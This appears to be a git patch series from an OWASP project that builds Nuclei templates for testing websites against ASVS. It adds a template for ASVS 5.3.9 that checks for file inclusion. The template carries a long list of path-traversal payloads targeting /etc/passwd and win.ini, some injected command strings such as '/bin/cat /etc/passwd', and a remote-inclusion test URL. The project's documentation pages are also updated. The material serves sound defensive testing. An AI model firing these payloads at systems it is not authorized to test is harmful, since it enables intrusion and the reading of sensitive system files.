From 88dbe46f73aa63ce6e7303f01c26852eab033591 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 3 Dec 2024 12:19:34 +0000 Subject: [PATCH 1/6] =?UTF-8?q?chore:=20sign=20templates=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates/9.1.3.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml index a71233a..44dd7d7 100644 --- a/templates/9.1.3.yaml +++ b/templates/9.1.3.yaml @@ -45,4 +45,4 @@ ssl: - type: json json: - " .tls_version" -# digest: 4b0a00483046022100ad668aabd5f22ba949265c214a22dd6393fc9d65118f5551704be20c9791b4fa022100a7d26f7b256f003b8db0d8794e22f7e63f051f5674b5ff4ed8a01b6cfa8787e3:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file +# digest: 490a0046304402205b53c3cab68f7b47834112a627baff87bd3b313b6d2b56c38b969787c5242ab7022011ff41ab8b4ad27670fa5f30be120e02469401cec098341105cbb946538a6aa2:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file From 782344796a444434dffc08fae0ac0297cb538a4d Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Fri, 6 Dec 2024 01:02:42 +0330 Subject: [PATCH 2/6] Create 5.3.9.yaml Based on requirement 5.3.9, this template checks whether the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks. Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.3.9.yaml | 143 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 143 insertions(+) create mode 100644 templates/dast/5.3.9.yaml diff --git a/templates/dast/5.3.9.yaml b/templates/dast/5.3.9.yaml new file mode 100644 index 0000000..8c68b94 --- /dev/null +++ b/templates/dast/5.3.9.yaml @@ -0,0 +1,143 @@ +id: ASVS-4-0-3-V5-3-9 + +info: + name: ASVS 5.3.9 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-829 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9/ + - https://github.com/projectdiscovery/nuclei-templates/tree/main/dast/vulnerabilities/lfi + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/ + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion + tags: asvs,5.3.9 + description: | + Verify that the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks. + metadata: + max-request: 90 + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + LFI-RFI: + # LFI (Linux) + - '/etc/passwd' + - '../etc/passwd' + - '../../etc/passwd' + - '../../../etc/passwd' + - '/../../../../etc/passwd' + - '../../../../../../../../../etc/passwd' + - '../../../../../../../../etc/passwd' + - '../../../../../../../etc/passwd' + - '../../../../../../etc/passwd' + - '../../../../../etc/passwd' + - '../../../../etc/passwd' + - '../../../etc/passwd' + - '../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd' + - '/../../../../../../../../../../etc/passwd^^' + - '/../../../../../../../../../../etc/passwd' + - '/./././././././././././etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '/..\../..\../..\../..\../..\../..\../etc/passwd' + - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '%252e%252e%252fetc%252fpasswd' + - '%252e%252e%252fetc%252fpasswd%00' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00' + - '....//....//etc/passwd' + - '..///////..////..//////etc/passwd' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd' + - '%0a/bin/cat%20/etc/passwd' + - '%00/etc/passwd%00' + - '%00../../../../../../etc/passwd' + - '/../../../../../../../../../../../etc/passwd%00.jpg' + - '/../../../../../../../../../../../etc/passwd%00.html' + - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd' + - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '\\'/bin/cat%20/etc/passwd\\'' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + # LFI (Windows) + - '\WINDOWS\win.ini' + - '../../windows/win.ini' + - '....//....//windows/win.ini' + - '../../../../../windows/win.ini' + - '/..///////..////..//////windows/win.ini' + - '/../../../../../../../../../windows/win.ini' + - './../../../../../../../../../../windows/win.ini' + - '..%2f..%2f..%2f..%2fwindows/win.ini' + - '\WINDOWS\win.ini%00' + - '\WINNT\win.ini' + - '\WINNT\win.ini%00' + - 'windows/win.ini%00' + - '/...\...\...\...\...\...\...\...\...\windows\win.ini' + - '/.../.../.../.../.../.../.../.../.../windows/win.ini' + - '/..../..../..../..../..../..../..../..../..../windows/win.ini' + - '/....\....\....\....\....\....\....\....\....\windows\win.ini' + - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini' + - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini' + - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini' + - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00' + - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini' + - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini' + - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini' + - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini' + - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini' + - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini' + - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini' + - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' + # RFI + - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt" + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{LFI-RFI}}' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: body + words: + - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a" From 771702dba3520db4bb9c925b66298058cb08d175 Mon Sep 17 00:00:00 2001 From: ghost Date: Thu, 5 Dec 2024 21:34:49 +0000 Subject: [PATCH 3/6] =?UTF-8?q?chore:=20sign=20templates=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates/9.1.3.yaml | 2 +- templates/dast/5.3.9.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml index 44dd7d7..31facb1 100644 --- a/templates/9.1.3.yaml +++ b/templates/9.1.3.yaml @@ -45,4 +45,4 @@ ssl: - type: json json: - " .tls_version" -# digest: 490a0046304402205b53c3cab68f7b47834112a627baff87bd3b313b6d2b56c38b969787c5242ab7022011ff41ab8b4ad27670fa5f30be120e02469401cec098341105cbb946538a6aa2:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file +# digest: 4b0a00483046022100e28690ed9b4e02b2f1b32d3e5fea4266b8aea6d668d35365ed9e94ad9515ae8e022100e25e0fd48313f9be115c8f93bb91dc18ad74ebf1997576b72c99e810ac804570:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file diff --git a/templates/dast/5.3.9.yaml b/templates/dast/5.3.9.yaml index 8c68b94..d87880d 100644 --- a/templates/dast/5.3.9.yaml +++ b/templates/dast/5.3.9.yaml @@ -141,3 +141,4 @@ http: part: body words: - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a" +# digest: 4b0a00483046022100b3629f17d8650d25acbacc2d85fae5ad2c1cecf14c89bb28701ce2c7011ffe05022100a6db4746322beb7989b39c1b04fb416b31f02ac55a9690507e46a62ae93f2ac5:236a7c23afe836fbe231d6e037cff444 \ No newline at end of file From bee479b8c435e0665e181c31df60497fd4304ac5 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 13 Dec 2024 12:06:12 +0330 Subject: [PATCH 4/6] Update index.md Signed-off-by: Hamed Salimian --- index.md | 31 ++++++++++++++++++++++++++++--- 1 file changed, 28 insertions(+), 3 deletions(-) diff --git a/index.md b/index.md index 2f02e06..e96ddf9 100644 --- a/index.md +++ b/index.md @@ -2,18 +2,43 @@ layout: col-sidebar title: OWASP ASVS Security Evaluation Templates with Nuclei -tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates asvs asvs-evaluation PoC-generator vulnerablity +tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates ASVS asvs-evaluation PoC-generator vulnerablity automation WSTG pentest level: 2 type: tool pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites. --- -This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. The templates and user interface will be tested for accuracy and usability, and once finalized, they will be made available for use. User feedback and usage of the templates and user interface will be monitored and analyzed, and updates will be made to the templates and user interface based on this feedback and usage. Finally, the project will be documented for future reference. +[![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) +[![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) -It's important to note that Since the implementation methods and frameworks used in web application design are very diverse, in this project, we will consider the existing best practice designs and develop nuclei templates based on them. +

+ +

+ +# OWASP ASVS Security Evaluation Templates with Nuclei + + +This project aims to develop [Nuclei](https://github.com/projectdiscovery/nuclei) templates for evaluating OWASP Application Security Verification Standard ([ASVS](https://owasp.org/www-project-application-security-verification-standard/)) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. + + The goal is to provide security professionals with an easy-to-use set of tools to test their web applications and identify potential vulnerabilities. +#### It's important to note that: +- Since the implementation methods and frameworks used in web application design are very diverse, in this project we will consider the existing best practice designs and develop nuclei templates based on them :) +- Also while these Nuclei templates are designed to help automate the process of evaluating web applications against ASVS requirements, they should not be considered a substitute for manual testing or other security best practices. +- Some templates are developed for a limited or specific scenario and should be modified and perfected according to the needs of the evaluator/user. ## Licensing [![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE) This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. + +## Contributing + +Contributions to this repository are welcome and encouraged. If you have created new Nuclei templates that evaluate additional ASVS requirements or have any idea about current templates, we'd love to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43). + +For detailed information and guidelines about contributing in developing template for ASVS evaluation, please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md) + +#### Core Team +The project current core team are: +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) From 9607835c27fdd20c20a2080164f994dec1357862 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 13 Dec 2024 12:44:56 +0330 Subject: [PATCH 5/6] Update info.md Signed-off-by: Hamed Salimian --- info.md | 26 ++++++++++++-------------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/info.md b/info.md index 4abe302..2a62776 100644 --- a/info.md +++ b/info.md @@ -1,23 +1,21 @@ -### Project Information -* [Incubator Project](#) -* [Version 0.0.0](#) +### Source in Github +* [🏡 Homepage](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) +* [📝 Templates](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/tree/main/templates) +* [🎯 Vulnerable Pages](https://github.com/Snbig/Vulnerable-Pages) -### Classification -* Tool - -### Audience -* Defender -* Breaker +### Project Classification +* Incubator Project +* Defender +* Breaker ### Community * [Slack Channel](https://owasp.slack.com/archives/C052939BZ43) ### Statistics -* [Daily Project Stats](#) - -### Code Repository -* [repo](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) +[![Commits](https://img.shields.io/github/commit-activity/m/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=flat&link=https%3A%2F%2Fgithub.com%2FOWASP%2Fwww-project-asvs-security-evaluation-templates-with-nuclei%2Fcommits%2Fmain%2F)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/commits/main/) ### Change Log -* [changes](#) +[![Open PRs](https://img.shields.io/github/issues-pr/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=flat&link=https%3A%2F%2Fgithub.com%2FOWASP%2Fwww-project-asvs-security-evaluation-templates-with-nuclei%2Fpulls)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/pulls) + +[![Closed PRs](https://img.shields.io/github/issues-pr-closed/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=flat&link=https%3A%2F%2Fgithub.com%2FOWASP%2Fwww-project-asvs-security-evaluation-templates-with-nuclei%2Fpulls%3Fq%3Dis%253Apr%2Bis%253Aclosed)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/pulls?q=is%3Apr+is%3Aclosed) From b528a576de80deafa8e335da99fb87e93401cdd4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 13 Dec 2024 12:54:24 +0330 Subject: [PATCH 6/6] Update index.md Signed-off-by: Hamed Salimian --- index.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/index.md b/index.md index e96ddf9..76adef8 100644 --- a/index.md +++ b/index.md @@ -8,10 +8,10 @@ type: tool pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites. --- - [![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) [![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) +![Github stars ASVS](https://img.shields.io/github/stars/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei?style=social)